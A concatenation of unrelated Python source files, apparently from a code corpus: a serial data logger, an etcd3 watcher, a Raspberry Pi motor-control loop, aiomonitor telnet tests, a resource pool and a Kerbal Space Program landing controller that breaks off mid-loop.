self.listen_thread.start() # starts thread
def pack_data(self):
self.lock.acquire() # hold the lock so stop_listening() cannot write the csv mid-acquisition
# Creates a list where the number of elements equals the number of columns of the df
try:
data = [(float(self.ser.readline().decode('utf-8').rstrip())) for _ in range(len(self.cols))]
except:
data = [None for _ in range(len(self.cols))]
# print(data)
df_temp = pd.DataFrame(np.array(data).reshape(1,-1),
columns=self.cols) # wraps the new sample in a one-row dataframe
self.df = pd.concat([self.df, df_temp]).reset_index(drop=True) # appends it to the running dataframe
self.lock.release()
# method used by thread
def waiting_for_data(self):
self.ser.reset_input_buffer() # resets input buffer before starting thread
while self.running: # runs while self.running = True
if (self.ser.in_waiting > 0): # if serial input buffer has data, trigger pack_data() method
self.pack_data()
# method is called by user when comms are to be terminated and collected
# data converted to csv
def stop_listening(self):
    self.running = False # terminates the comms thread
    self.lock.acquire() # waits for any in-flight pack_data() call to finish
    self.df.to_csv(self.output_csv, index=False) # converts the dataframe to csv
    print('data converted to csv')
    print('Comms thread terminated')
    self.lock.release()
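# Minimal usage sketch (the port name and column names are hypothetical,
# assuming a device that streams one float per line for each column):
#
#   logger = data_collection('/dev/ttyACM0', 'run1.csv', ['temp_c', 'humidity'])
#   time.sleep(60)            # collect for one minute
#   logger.stop_listening()   # flush the buffered rows to run1.csv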
|
_watcher.py | from __future__ import absolute_import
import logging
from threading import Thread
from time import sleep
import grpc
from etcd3 import _utils
from etcd3._grpc_bd_stream import GrpcBDStream
from etcd3._grpc_stubs.rpc_pb2 import WatchCreateRequest, WatchRequest
_DEFAULT_SPIN_PAUSE = 3 # seconds
_log = logging.getLogger(__name__)
class Watcher(object):
def __init__(self, client, key, event_handler, is_prefix=False,
start_revision=0, spin_pause=None):
self._client = client
self._key = key
self._is_prefix = is_prefix
self._start_revision = start_revision
self._event_handler = event_handler
self._spin_pause = spin_pause or _DEFAULT_SPIN_PAUSE
watch_create_rq = WatchCreateRequest(
key=_utils.to_bytes(key),
start_revision=start_revision)
if is_prefix:
watch_create_rq.range_end = _utils.range_end(watch_create_rq.key)
self._watch_rq = WatchRequest(create_request=watch_create_rq)
self._name = 'watcher_' + key
self._stop = False
self._thread = Thread(name=self._name, target=self._run)
self._thread.daemon = True
def start(self):
self._thread.start()
def stop(self, timeout=None):
self._stop = True
self._thread.join(timeout)
return not self._thread.is_alive()
def _run(self):
_log.info('%s started', self._name)
start_revision = None
while not self._stop:
try:
# Test if the key can be accessed. That is needed to trigger
# reconnects and also checks whether there are sufficient permissions.
self._client.get(self._key, self._is_prefix)
watch_stub = self._client._get_watch_stub()
grpc_stream = GrpcBDStream(self._name + '_stream',
watch_stub.Watch)
if start_revision:
self._watch_rq.create_request.start_revision = start_revision
grpc_stream.send(self._watch_rq, self._client._timeout)
except Exception:
_log.exception('Failed to initialize watch: %s', self._key)
sleep(self._spin_pause)
continue
try:
while not self._stop:
rs = grpc_stream.recv(self._spin_pause)
if not rs:
continue
if rs.created:
_log.info('Watch created: %s', self._key)
for e in rs.events:
start_revision = e.kv.mod_revision + 1
try:
self._event_handler(e)
except Exception:
_log.exception('Event handler failed: %s', e)
except grpc.RpcError as err:
severity = logging.ERROR
# A Cancelled error is raised when the underlying gRPC channel
# is reset by the client itself while retrying a gRPC error. On
# the off chance the error is returned for another, as yet
# unknown reason, it is reported as a warning rather than info.
if err.code() == grpc.StatusCode.CANCELLED:
severity = logging.WARN
_log.log(severity, 'Watch stream failed: %s', self._key)
sleep(self._spin_pause)
except Exception:
_log.exception('Watch stream failed: %s', self._key)
sleep(self._spin_pause)
finally:
grpc_stream.close(self._client._timeout)
_log.info('%s stopped', self._name)
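# Minimal usage sketch (the client object and key below are assumptions; any
# etcd3 client exposing get() and _get_watch_stub() as used above would do):
#
#   def on_event(event):
#       print(event.kv.key, event.kv.value)
#
#   watcher = Watcher(client, '/config/flags', on_event, is_prefix=True)
#   watcher.start()
#   ...
#   watcher.stop(timeout=5)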
|
main.py | from __future__ import print_function
# python imports
from multiprocessing import Process, Value, Array, Queue
from collections import deque
from time import sleep
# RPi imports
import serial
# my imports
from capture_layer import CaptureLayer
from input_layer import InputLayer
from control_layer import ControlLayer
motor_busy = Value('b')
motor_busy.value = True
control_vector = Array('f', [0,0,0])
def serial_control():
global motor_busy, control_vector
port = serial.Serial(port='/dev/ttyS0', baudrate = 115200, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS,timeout=.01)
while True:
    s_in = port.readline().decode('ascii', 'ignore')
    if len(s_in) > 0:
        motor_busy.value = 1 if (s_in[:4] == "busy") else 0
    #print(motor_busy.value, s_in)
    port.write(("X%d \n" % control_vector[0]).encode('ascii'))
    if control_vector[1] != 0:
        data = "C%d \n" % control_vector[1]
        port.write(data.encode('ascii'))
        print("sent data:", data)
    port.write(("S%f \n" % control_vector[2]).encode('ascii'))
########################################################
def main():
capture_layer = CaptureLayer()
input_layer = InputLayer()
control_layer = ControlLayer()
main_loop = True
capture_thread = Process(target=capture_layer.run_capture)
serial_thread = Process(target=serial_control)
capture_thread.start()
serial_thread.start()
last_busy = 1
while main_loop:
shape = capture_layer.marker_shape[:]
input_layer.update(shape, motor_busy.value)
control_layer.update(input_layer)
control_vector[0:3] = control_layer.get_control_vector()
if last_busy != motor_busy.value:
last_busy = motor_busy.value
print("BUSY" if motor_busy.value else "FREE")
if control_vector[1] != 0:
print("%d cm, %.1f deg" % (input_layer.distance_cm, input_layer.angle_deg)," "*8)
print("desired %d cm = %d steps" % (control_layer.desired_cm, control_vector[1]),
"conf: %.2f" % input_layer.distance_filter.confidence())
sleep(0.020)
########################################################
if __name__ == '__main__':
main() |
test_monitor.py | import asyncio
import pytest
import telnetlib
import threading
import time
from aiomonitor import Monitor, start_monitor
from aiomonitor.monitor import MONITOR_HOST, MONITOR_PORT
@pytest.yield_fixture
def monitor(loop):
def make_baz():
return 'baz'
locals_ = {'foo': 'bar', 'make_baz': make_baz}
mon = Monitor(loop, locals=locals_)
ev = threading.Event()
def f(mon, loop, ev):
asyncio.set_event_loop(loop)
with mon:
ev.set()
loop.run_forever()
thread = threading.Thread(target=f, args=(mon, loop, ev))
thread.start()
ev.wait()
yield mon
loop.call_soon_threadsafe(loop.stop)
thread.join()
@pytest.yield_fixture
def tn_client(monitor):
tn = telnetlib.Telnet()
for _ in range(10):
try:
tn.open(MONITOR_HOST, MONITOR_PORT, timeout=5)
break
except OSError as e:
print('Retrying after error: {}'.format(str(e)))
time.sleep(1)
else:
pytest.fail('Can not connect to the telnet server')
tn.read_until(b'monitor >>>', 10)
yield tn
tn.close()
def test_ctor(loop, unused_port):
with Monitor(loop, console_enabled=False):
loop.run_until_complete(asyncio.sleep(0.01, loop=loop))
with start_monitor(loop, console_enabled=False) as m:
loop.run_until_complete(asyncio.sleep(0.01, loop=loop))
assert m.closed
m = Monitor(loop, console_enabled=False)
m.start()
try:
loop.run_until_complete(asyncio.sleep(0.01, loop=loop))
finally:
m.close()
m.close() # make sure call is idempotent
assert m.closed
m = Monitor(loop, console_enabled=False)
m.start()
with m:
loop.run_until_complete(asyncio.sleep(0.01, loop=loop))
assert m.closed
def execute(tn, command, pattern=b'>>>'):
tn.write(command.encode('utf-8'))
data = tn.read_until(pattern, 100)
return data.decode('utf-8')
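# e.g. execute(tn, 'ps\n') sends the command and returns everything up to the
# next '>>>' prompt as text (tn being the telnet client from the fixture above).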
def get_task_ids(loop):
return [id(t) for t in asyncio.Task.all_tasks(loop=loop)]
def test_basic_monitor(monitor, tn_client, loop):
tn = tn_client
resp = execute(tn, 'help\n')
assert 'Commands' in resp
resp = execute(tn, 'xxx\n')
assert 'Unknown command' in resp
resp = execute(tn, 'ps\n')
assert 'Task' in resp
resp = execute(tn, 'ps 123\n')
assert 'Task' in resp
resp = execute(tn, 'signal name\n')
assert 'Unknown signal name' in resp
resp = execute(tn, 'where 123\n')
assert 'No task 123' in resp
resp = execute(tn, 'cancel 123\n')
assert 'No task 123' in resp
def test_cancel_where_tasks(monitor, tn_client, loop):
tn = tn_client
async def sleeper(loop):
await asyncio.sleep(100, loop=loop) # xxx
fut = asyncio.run_coroutine_threadsafe(sleeper(loop), loop=loop)
# TODO: we should not rely on timeout
time.sleep(0.1)
task_ids = get_task_ids(loop)
assert len(task_ids) > 0
for t_id in task_ids:
resp = execute(tn, 'where {}\n'.format(t_id))
assert 'Task' in resp
resp = execute(tn, 'cancel {}\n'.format(t_id))
assert 'Cancel task' in resp
fut.cancel()
def test_monitor_with_console(monitor, tn_client):
tn = tn_client
resp = execute(tn, 'console\n')
assert 'This console is running in an asyncio event loop' in resp
execute(tn, 'await asyncio.sleep(0, loop=loop)\n')
resp = execute(tn, 'foo\n')
assert ' bar\n>>>' == resp
resp = execute(tn, 'make_baz()\n')
assert ' baz\n>>>' == resp
execute(tn, 'exit()\n')
resp = execute(tn, 'help\n')
assert 'Commands' in resp
|
pool.py | from __future__ import absolute_import, unicode_literals, print_function, division
import time
from queue import Queue, Empty
from threading import Lock
class _ResourcePoolSession(object):
def __init__(self, pool, obj, close_on_exc=False):
self.__pool = pool
self.__obj = obj
self.__close_on_exc = close_on_exc
self.__closed = False
def __repr__(self):
return "ResourcePoolSession(obj={0})".format(self.__obj)
def __getattr__(self, name):
if self.__closed:
raise RuntimeError("The session has been closed.")
return getattr(self.__obj, name)
def __del__(self):
self.release_to_pool()
def __enter__(self):
return self
def __exit__(self, ex_type, ex_value, traceback):
self.release_to_pool(ex_type is not None)
def release_to_pool(self, close=False):
    """Release the obj back into the resource pool.
    If close is True, close the obj first and put a placeholder back into
    the pool; a fresh obj is then created lazily by the next get().
    """
if self.__closed:
return
self.__closed = True
if close:
try:
self.__obj.close()
except Exception:
pass
self.__obj = None
self.__pool._put_from_session(self.__obj)
def close(self):
self.release_to_pool(close=True)
class ResourcePool(object):
def __init__(self, cls, *args, capacity=0, idle_timeout=None, autowrap=False,
close_on_exc=False, **kwargs):
    """Create a new pool object.
    @param cls(object): The object class to be managed.
    @param args(tuple): The positional parameters of cls.
    @param kwargs(dict): The keyword parameters of cls.
    @param capacity(int): The maximum capacity of the pool.
                          If 0, the capacity is infinite.
    @param idle_timeout(int): The idle timeout in seconds.
                              If None or 0, objects never time out.
    @param autowrap(bool): If True, wrap the obj in a ResourcePoolSession
                           automatically, which releases the obj back into
                           the pool when the session is closed or deleted.
    @param close_on_exc(bool): If True and autowrap is True, a session leaving
                               a with-block on an exception closes the obj
                               first and puts a placeholder back into the pool.
    """
capacity = capacity if capacity >= 0 else 0
self._cls = cls
self._args = args
self._kwargs = kwargs
self._closed = False
self._lock = Lock()
self._capacity = capacity
self._timeout = idle_timeout
self._pools = Queue(capacity)
self._autowrap = autowrap
self._close_on_exc = close_on_exc
while capacity > 0:
self.put(None)
capacity -= 1
def __del__(self):
self.close()
def _get_now(self):
return int(time.time())
def _close_obj(self, obj):
if obj:
try:
obj.close()
except Exception:
pass
def close(self):
    """Close the pool and release all the objects.
    Once closed, get() raises a RuntimeError and put() simply closes the
    object handed to it.
    """
with self._lock:
if self._closed:
return
self._closed = True
while True:
try:
self._close_obj(self._pools.get_nowait()[0])
self._pools.task_done()
except Empty:
return
def get(self, timeout=None):
"""Get an object from the pool.
When the pool is closed, it will raise a RuntimeError if calling this
method.
"""
with self._lock:
if self._closed:
raise RuntimeError("The pool has been closed.")
_get = lambda obj: _ResourcePoolSession(self, obj, self._close_on_exc) \
if obj and self._autowrap else obj
if not self._capacity:
try:
obj = self._pools.get_nowait()
self._pools.task_done()
except Empty:
obj = (self._cls(*self._args, **self._kwargs), self._get_now())
else:
obj = self._pools.get(timeout=timeout)
self._pools.task_done()
if obj and obj[0]:
if self._timeout and self._get_now() - obj[1] > self._timeout:
return _get(self.get(timeout=timeout))
return _get(obj[0])
return _get(self._cls(*self._args, **self._kwargs))
def put(self, obj):
"""Put an object into the pool.
When the pool is closed, it will close the object, not put it into the
pool, if calling this method.
"""
with self._lock:
if self._closed:
self._close_obj(obj)
return
if isinstance(obj, _ResourcePoolSession):
obj.release_to_pool()
else:
self._pools.put_nowait((obj, self._get_now()))
def put_with_close(self, obj):
self._close_obj(obj)
self.put(None)
def _put_from_session(self, obj):
self._pools.put_nowait((obj, self._get_now()))
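# Minimal session sketch (assumes a pool built with autowrap=True, as in the
# demo below): attribute access on the session is proxied to the pooled object.
#
#   with pool.get() as session:
#       print(session.time)   # resolved on the wrapped Obj via __getattr__
#   # leaving the with-block releases the object back into the pool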
def main(pool):
o1 = pool.get()
print(o1)
o2 = pool.get()
print(o2)
def f():
o3 = pool.get()
print(o3)
pool.put(o3)
t = Thread(target=f)
t.start()
time.sleep(3)
pool.put(o1)
pool.put(o2)
return t
if __name__ == "__main__":
import time
from threading import Thread
class Obj(object):
def __init__(self):
self.time = time.time()
time.sleep(0.1)
def close(self):
print("close {0}".format(self.time))
def __repr__(self):
return "Obj(time={0})".format(self.time)
pool = ResourcePool(Obj, capacity=2, idle_timeout=1, autowrap=True)
task = main(pool)
time.sleep(1)
task.join()
|
KSP_controller_starship.py |
import krpc
import time
import math
import numpy as np
import numpy.linalg as npl
import SC_solver as solver
import SC_params
from KSP_controller_utils import *
from threading import Thread
print('--------')
# Read the parameters from KSP_controller_starship_params.txt
params = {}
with open('KSP_controller_starship_params.txt', 'r', encoding='utf-8') as f:
for line in f:
pair = line.split('#')[0].split('=')
if len(pair) == 2:
key = pair[0].strip()
value = eval(pair[1]) # the params file is trusted; values are evaluated as Python expressions
params[key] = value
# Print the parameters
print('----------params------------')
for k in params:
print(' %s: \n%s' % (k, params[k]))
print('\n\ninitializing...')
# Constants
deg2rad = math.pi / 180
rad2deg = 180 / math.pi
g0 = params['g0']
# Connect to kRPC
print('connecting...')
conn = krpc.connect(name='SC_controller')
space_center = conn.space_center
vessel = space_center.active_vessel
flight = vessel.flight()
body = vessel.orbit.body
# 'TE2.19.BFS.SL.RAPTOR'
# 'TE2.19.SS.RF.R'
# 'TE2.19.SS.RF.L'
# 'TE2.19.SS.FF.R'
# 'TE2.19.SS.FF.L'
# 'SyncModuleControlSurface' module
# -90 = fully raised, +90 = fully down
#f_rr = [m for m in vessel.parts.with_name('TE2.19.SS.RF.R')[0].modules if m.name == 'SyncModuleControlSurface'][0]
#f_rr.set_field_float('Deploy Angle', 90)
#f_rr.set_field_string('Deploy', 'false')
#asdf
# starship main engines
engine_gimbal = [m for m in vessel.parts.with_name('TE2.19.BFS.SL.RAPTOR')[0].modules if m.name == 'ModuleGimbal']
# 'TE2.19.BFS.SL.RAPTOR'
engine_y = vessel.parts.with_name('TE2.19.BFS.SL.RAPTOR')[0].position(vessel.reference_frame)[1]
# starship flap
get_hinge = lambda tagname:[m for m in vessel.parts.with_tag(tagname)[0].modules if m.name=='ModuleRoboticServoHinge'][0]
h_fl = get_hinge('h_fl')
h_fr = get_hinge('h_fr')
h_rl = get_hinge('h_rl')
h_rr = get_hinge('h_rr')
#set 'Target Angle' 0~180
def set_deploy(h, deploy, center=90):
aoa = math.asin(clamp(deploy, 0, 1)) * rad2deg
h.set_field_float('Target Angle', clamp(90 + center - aoa, 0, 180))
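# e.g. set_deploy(h, 0.5) gives aoa = asin(0.5) = 30 deg, so with the default
# center of 90 the servo target becomes clamp(90 + 90 - 30, 0, 180) = 150.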
#set_deploy = lambda h, deploy: h.set_field_float('Target Angle', 180 - math.asin(clamp(deploy, 0, 1)) * rad2deg)
#set_deploy_rev = lambda h, deploy: h.set_field_float('Target Angle', math.asin(clamp(deploy, 0, 1)) * rad2deg)
set_retract = lambda h:h.set_field_float('Target Angle', 180)
set_deploy(h_fl, 1)
set_deploy(h_fr, 1)
set_deploy(h_rl, 1)
set_deploy(h_rr, 1)
#asdf
#fin_weight_ratio = 0.8 / 1.0
#def combine_flaps(pitch_up, roll_right, roll_attack=0):
# roll_attack = clamp(roll_attack, -60, 60)
# pitch_up = clamp(pitch_up, -1, 1)
# roll_right = clamp(roll_right, -1, 1)
# ctrl_fl = (pitch_up + roll_right) / fin_weight_ratio # the front and rear flaps differ in size; correction factor
# ctrl_fr = (pitch_up - roll_right) / fin_weight_ratio
# ctrl_rl = -pitch_up + roll_right
# ctrl_rr = -pitch_up - roll_right
# gap = max(0, 0.95 - max(ctrl_fl, ctrl_fr, ctrl_rl, ctrl_rr))
# ctrl_fl += gap
# ctrl_fr += gap
# ctrl_rl += gap
# ctrl_rr += gap
# set_deploy(h_fl, (ctrl_fl) / 2. + 0.5, 90 - roll_attack)
# set_deploy(h_fr, (ctrl_fr) / 2. + 0.5, 90 + roll_attack)
# set_deploy(h_rl, (ctrl_rl) / 2. + 0.5, 90 - roll_attack)
# set_deploy(h_rr, (ctrl_rr) / 2. + 0.5, 90 + roll_attack)
def combine_flaps(pitch_up, spin_right):
pitch_up = clamp(pitch_up, -1, 1)
#roll_right = clamp(roll_right, -1, 1)
spin_right = clamp(spin_right, -1, 1)
ctrl_fl = pitch_up
ctrl_fr = pitch_up
ctrl_rl = -pitch_up
ctrl_rr = -pitch_up
gap = max(0, 0.95 - max(ctrl_fl, ctrl_fr, ctrl_rl, ctrl_rr))
ctrl_fl += gap
ctrl_fr += gap
ctrl_rl += gap
ctrl_rr += gap
ctrl_fl += -spin_right * 0.4
ctrl_fr += spin_right * 0.4
ctrl_rl += spin_right * 0.28
ctrl_rr += -spin_right * 0.28
set_deploy(h_fl, (ctrl_fl) / 2. + 0.5)
set_deploy(h_fr, (ctrl_fr) / 2. + 0.5)
set_deploy(h_rl, (ctrl_rl) / 2. + 0.5)
set_deploy(h_rr, (ctrl_rr) / 2. + 0.5)
def retract_flaps():
(h_fl).set_field_float('Target Angle', 180)
(h_fr).set_field_float('Target Angle', 180)
(h_rl).set_field_float('Target Angle', 180)
(h_rr).set_field_float('Target Angle', 180)
#gimbal
#hinge_x = [m for m in vessel.parts.with_tag('hx')[0].modules if m.name=='ModuleRoboticServoHinge'][0]
#hinge_z = [m for m in vessel.parts.with_tag('hz')[0].modules if m.name=='ModuleRoboticServoHinge'][0]
#hinge_offset_y = hinge_x.part.position(vessel.reference_frame)[1]
#gimbalX = lambda angle:hinge_x.set_field_float('Target Angle', angle)
#gimbalY = lambda angle:hinge_z.set_field_float('Target Angle', angle)
#print(hinge_x.fields)
#www
delta_time = 0.01
# Convert the target latitude/longitude to the body-fixed frame
target_lat = params['target_lat'] * deg2rad
target_lon = params['target_lon'] * deg2rad
target_height = params['target_height']
target_axis = target_height + body.surface_height(target_lat * rad2deg, target_lon * rad2deg) + body.equatorial_radius
target_body_pos = np.array((math.cos(target_lon) * math.cos(target_lat), math.sin(target_lat), math.sin(target_lon) * math.cos(target_lat))) * target_axis
#limit
throttle_limit = params['throttle_limit']
throttle_limit_ctrl = params['throttle_limit_ctrl']
max_tilt = np.deg2rad(params['max_tilt'])
max_tilt_off = np.deg2rad(params['max_tilt_off'])
# Build a VesselProfile from the kRPC vessel object
def get_vessel_profile(vessel):
p = SC_params.VesselProfile()
p.isp = vessel.specific_impulse
p.g = vec(-g0, 0., 0.) # gravity
p.m_dry = vessel.dry_mass
p.gamma_gs = np.deg2rad(params['gamma_gs']) # glide slope
p.theta_max = np.linspace(np.deg2rad(params['max_tilt']), np.deg2rad(10), SC_params.SuperParams().K) # tilt
p.omega_max = np.deg2rad(params['max_omega']) # rotation vel
p.delta_max = np.deg2rad(params['max_delta']) # gimbal
p.T_min = vessel.available_thrust * throttle_limit[0]
p.T_max = vessel.available_thrust * throttle_limit[1]
p.r_T_B = vec(engine_y, 0., 0.) # thrust offset
p.J_B_I = np.array(vessel.inertia_tensor).reshape((3, 3))
p.airfric_k = params['airfric_k']
p.time_guess = params['tf_guess']
return p
# Predict the VesselState at a given altitude by extrapolating the kRPC vessel object
def predict_vessel_state(vessel, est_height):
# ref_target flight
vel = vec(vessel.velocity(ref_target))
pos = vec(vessel.position(ref_target))
est_t = (pos[0] - est_height) / (-vel[0]) # assume constant velocity
est_pos = pos + est_t * vel
hdg_right = (flight.heading + 90) * deg2rad # heading of the vessel's right-hand side
rot_axis = v3(0, math.cos(hdg_right), math.sin(hdg_right))
rot_quat = quat(rot_axis, 90 * deg2rad)
#qx, qy, qz, qw = vessel.rotation(ref_target) # xyzw to wxyz
qx, qy, qz, qw = rot_quat # xyzw to wxyz
state = SC_params.VesselState()
state.mass = vessel.mass
state.pos = est_pos
state.vel = vel
state.rotation = vec(qw, qx, qy, qz)
#state.rotation = vec(1, 0, 0, 0)
state.omega = vec(0, 0, 0)
return state
# Reserve final_height for a vertical final descent and back-solve the terminal state
def get_final_state(vessel, final_height):
optimal_acc = vessel.available_thrust / vessel.mass * params['final_throttle'] - g0
final_vel = math.sqrt(2 * optimal_acc * final_height)
state = SC_params.VesselState()
state.mass = vessel.mass
state.pos = vec(final_height, 0, 0)
state.vel = vec(-final_vel, 0, 0)
state.rotation = vec(1, 0, 0, 0)
state.omega = vec(0, 0, 0)
return state
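# The terminal descent speed follows from v^2 = 2*a*h: e.g. with
# optimal_acc = 10 m/s^2 and final_height = 20 m, final_vel = sqrt(2*10*20) = 20 m/s.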
# ------- PID controller initialization ----------
#fall attitude
ctrl_fall_pitch = PID()
ctrl_fall_pitch.kp = params['ctrl_fall_pitch.kp']
ctrl_fall_pitch.kd = params['ctrl_fall_pitch.kd']
#ctrl_fall_pitch.ki = params['ctrl_fall_pitch.ki'] # set that later
ctrl_fall_pitch.integral_limit = params['ctrl_fall_pitch.integral_limit']
ctrl_fall_yaw = PID()
ctrl_fall_yaw.kp = 0 # params['ctrl_fall_yaw.kp']
ctrl_fall_yaw.kd = params['ctrl_fall_yaw.kd']
ctrl_fall_roll = PID()
ctrl_fall_roll.kp = params['ctrl_fall_roll.kp']
ctrl_fall_roll.kd = params['ctrl_fall_roll.kd']
ctrl_fall_distance = PID()
ctrl_fall_distance.kp = params['ctrl_fall_distance.kp']
ctrl_fall_distance.kd = params['ctrl_fall_distance.kd']
#rotation
ctrl_x_rot = PID()
ctrl_x_rot.kp = params['ctrl_x_rot.kp']
ctrl_x_rot.kd = params['ctrl_x_rot.kd']
#ctrl_x_rot.redundancy = 0.1
ctrl_y_avel_kp = params['ctrl_y_avel_kp']
ctrl_z_rot = PID()
ctrl_z_rot.kp = params['ctrl_z_rot.kp']
ctrl_z_rot.kd = params['ctrl_z_rot.kd']
#ctrl_z_rot.redundancy = 0.1
# measured values
#torque = v3(3.66e+04, 5000, 3.66e+04)
#torque_k = v3(8.2e+04-3.66e+04, 0, 8.2e+04-3.66e+04)
#torque = v3(10300.000011920929, 10300.000011920929, 10300.000011920929)
#torque_k = v3(15183.20083618, 10772.2761631, 15183.24184418)
#print(vessel.available_torque)
# k
k_x = params['k_x']
k_v = params['k_v']
# final
final_throttle = params['final_throttle']
final_kp = params['final_kp']
# time init
game_delta_time = 0.02
game_prev_time = space_center.ut
start_time = time.time()
# references
print('creating target frame...')
ref_local = vessel.reference_frame
ref_surface = vessel.surface_reference_frame # surface frame, origin at the vessel's center of mass
ref_body = body.reference_frame # body-fixed frame
ref_target_temp = space_center.ReferenceFrame.create_relative(ref_body, position=target_body_pos) # body-fixed frame translated so its origin sits at the target
ref_target = space_center.ReferenceFrame.create_hybrid(ref_target_temp, rotation=ref_surface, velocity=ref_target_temp) # hybrid frame: origin at the target, rotation follows the surface frame (Up-North-East)
prev_vel = vec(vessel.velocity(ref_surface))
K = SC_params.SuperParams().K
solved_path = None
n_i = -1
error = vec(vessel.position(ref_target))
#print('current error: %s' % error)
debug_lines = params['debug_lines']
if debug_lines:
print('debug lines...')
lines = [conn.drawing.add_line((0,0,0),(0,0,0), ref_target) for i in range(K-1)] # trajectory lines
directions = [conn.drawing.add_line((0,0,0), (1,0,0), ref_target) for i in range(K)] # nose directions
thrustvecs = [conn.drawing.add_line((0,0,0), (1,0,0), ref_target) for i in range(K)] # thrust directions
target_line = conn.drawing.add_line((0,0,0),(1,0,0),ref_target) # trajectory sample marker
target_line.color = (0,0,1)
target2_line = conn.drawing.add_line((0,0,0),(1,0,0),ref_target) # look-ahead sample marker
target2_line.color = (0,0,1)
head_line = conn.drawing.add_line((0,0,0),(1,0,0),ref_target) # target attitude direction
head_line.color = (0,1,1)
for line in directions:
line.color = (1,0,0)
for line in thrustvecs:
line.color = (1,0,1)
nav_mode = 'none'
frcount = 0
def update_lines(x, u):
print('debug lines...')
m_u = vessel.available_thrust
for i in range(K-1):
lines[i].start = x[1:4, i]
lines[i].end = x[1:4, i+1]
for i in range(K):
mat = rotation_mat(x[7:11, i])
directions[i].start = x[1:4, i]
directions[i].end = x[1:4, i] + transform(vec(1, 0, 0), mat) * 5
thrustvecs[i].start = x[1:4, i]
thrustvecs[i].end = x[1:4, i] - transform(u[:, i], mat) / m_u * 10
# Find the (fractional) index of the trajectory point nearest to the current position
def find_nearest_index(rk, vk, error):
nearest_mag = npl.norm(rk[:, 0] - error)
nearest_i = 0
for i in range(rk.shape[1]):
mag = npl.norm(rk[:, i] - error) # + npl.norm(x[3:6, i] - v) * 0.2
if mag < nearest_mag:
nearest_mag = mag
nearest_i = i
v = vk[:, nearest_i]
v_norm = npl.norm(v)
v_dir = v / v_norm
frac = clamp(np.dot(error - rk[:, nearest_i], v_dir) / (tf / K * v_norm), 0.5, -0.5)
return nearest_i + frac
# Sample the trajectory at a fractional index
def sample_index(index, rk, vk, qk, uk):
#if index >= N-1:
if index >= K-1:
return (rk[:, K-1], vk[:, K-1], qk[:, K-1], uk[:, K-1])
#return (v3(0,0,0), v3(0,0,0), v3( 9.807,0,0))
elif index <= 0:
i = 0
frac = index
else:
i = math.floor(index)
frac = index - i
r_i_s = lerp(rk[:, i], rk[:, i+1], frac)
v_i_s = lerp(vk[:, i], vk[:, i+1], frac)
q_i_s = lerp(qk[:, i], qk[:, i+1], frac)
u_i_s = lerp(uk[:, i], uk[:, i+1], frac)
if index < 0:
u_i_s = uk[:, 1].copy()
#print('u1234 ' + str(u[:, 0:4]))
#print('u_i_s ' + str(u[:, 1]))
return (r_i_s.copy(), v_i_s.copy(), q_i_s.copy(), u_i_s.copy())
# Clamp an acceleration vector into a conical-frustum region
def conic_clamp(target_a, min_mag, max_mag, max_tilt):
a_mag = npl.norm(target_a)
hor_dir = v3(0, target_a[1], target_a[2])
hor_dir /= npl.norm(hor_dir)
#target_direction = target_a / a_mag
a_hor = npl.norm(target_a[1:3])
a_ver = target_a[0]
if (a_hor < min_mag * math.sin(max_tilt)):
a_ver_min = math.sqrt(min_mag**2 - a_hor**2)
else:
a_ver_min = math.cos(max_tilt) * min_mag
if (a_hor < max_mag * math.sin(max_tilt)):
a_ver_max = math.sqrt(max_mag**2 - a_hor**2)
else:
a_ver_max = math.cos(max_tilt) * max_mag
a_ver = clamp(a_ver, a_ver_max, a_ver_min)
a_hor = min(a_hor, a_ver * math.tan(max_tilt))
return hor_dir * a_hor + v3(a_ver, 0, 0)
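# e.g. conic_clamp(v3(0, 1, 0), 1, 1, 30 * deg2rad) returns roughly v3(0.866, 0.5, 0):
# a horizontal unit vector gets pulled up onto the 30-degree cone around vertical.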
# Solve the descent trajectory and store it in the global solved_path
def solve_path(vessel_profile, vessel_state, vessel_final_state):
global solved_path, n_i
print('----------vessel_profile(original)------------')
for k in (vessel_profile.__dict__):
print('-- %s: \n%s' % (k, vessel_profile.__dict__[k]))
print('----------vessel_state(original)------------')
for k in (vessel_state.__dict__):
print('-- %s: \n%s' % (k, vessel_state.__dict__[k]))
print('----------vessel_final_state(original)------------')
for k in (vessel_final_state.__dict__):
print('-- %s: \n%s' % (k, vessel_final_state.__dict__[k]))
solver_options = SC_params.SolverOptions()
solver_options.w_delta = lambda i:(1e-3 * (2 ** i))
#solver_options.w_nu = 1e5
print('---------solving----------')
solved_path = solver.solve(vessel_profile, vessel_state, vessel_final_state,
solver_options=solver_options, use_c=True, verbose=True)
if solved_path != None:
(x, u, tf) = solved_path
qw, qx, qy, qz = x[7:11, :]
x[7:11, :] = vec(qx, qy, qz, qw) # wxyz to xyzw
n_i = -100
solved_path = (x, u, tf)
# print('x slice')
# print(x[:, 0:3])
# print('u slice')
# print(u[:, 0:3])
print('---------solve done----------')
if debug_lines:
update_lines(x, u)
else:
print('---------solve error----------')
print('---------loop start-------------')
set_deploy(h_fl, 1)
set_deploy(h_fr, 1)
set_deploy(h_rl, 1)
set_deploy(h_rr, 1) # put the fins in their neutral state
while True:
time.sleep(delta_time)
real_time = time.time() - start_time
ut = space_center.ut
game_delta_time = ut - game_prev_time
if game_delta_time < 0.01: # less than one in-game physics frame has elapsed, so skip this iteration
continue
# Fetch some data that is used later on
vessel_d = {}
error = vessel_d['error'] = vec(vessel.position(ref_target)) # position error in the target frame
avel = vessel_d['avel'] = vec(vessel.angular_velocity(ref_surface)) # angular velocity in the surface frame (equal to the target-frame value)
vel = vessel_d['vel'] = vec(vessel.velocity(ref_target)) # velocity over the ground
rotation_local2srf = rotation_mat(vec(vessel.rotation(ref_surface))) # rotation matrix from the body frame to the surface frame
rotation_srf2local = npl.inv(rotation_local2srf) # rotation matrix from the surface frame to the body frame
moment_of_inertia_local = vec(vessel.moment_of_inertia) # moment of inertia
mass = vessel_d['mass'] = vessel.mass
max_thrust = vessel_d['max_thrust'] = vessel.available_thrust
acceleration = vessel_d['acceleration'] = (vel - prev_vel) / game_delta_time
#print(game_delta_time)
if nav_mode == 'launch': # hop to a set altitude
    balanced_thr = mass * g0 / max_thrust
    target_direction = v3(1, 0.02, 0) # tilt slightly off vertical
    #print(target_direction)
    vessel.control.throttle = balanced_thr + (params['hop_vel'] - npl.norm(vel)) * 0.05 # proportional feedback control
    #print(error[0])
    if (error[0] > params['hop_altitude']):
        nav_mode = 'transit'
        print('transit')
elif nav_mode == 'transit': # reduce thrust until the vertical velocity turns negative
    balanced_thr = mass * g0 / max_thrust
